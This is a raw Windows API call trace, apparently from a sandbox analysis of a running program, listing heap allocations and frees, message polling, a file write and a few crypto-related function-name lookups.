PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0255.258] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0255.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f1b5d0 [0255.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f22b90 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1b5d0 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f1b5d0 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f22b90 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x2f22b90 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1b5d0 | out: hHeap=0x970000) returned 1 [0255.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f17af0 | out: hHeap=0x970000) returned 1 [0255.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0255.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0255.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0255.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0255.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0255.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1f0b0 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0255.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf3b30 | out: hHeap=0x970000) returned 1 [0255.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0255.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0255.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x3bf0050 [0255.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f22b90 | out: hHeap=0x970000) returned 1 [0255.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0255.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0255.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0255.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0255.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3ad8) returned 0x3bf3b30 [0255.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.269] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf3b30*, nNumberOfBytesToWrite=0x3ad8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf3b30*, lpNumberOfBytesWritten=0x8cf5e4*=0x3ad8, lpOverlapped=0x0) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf3b30 | out: hHeap=0x970000) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0255.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0255.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0255.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0255.272] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0255.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0255.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0255.273] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0255.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0255.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0255.274] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0255.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0255.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0255.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0255.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0255.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) 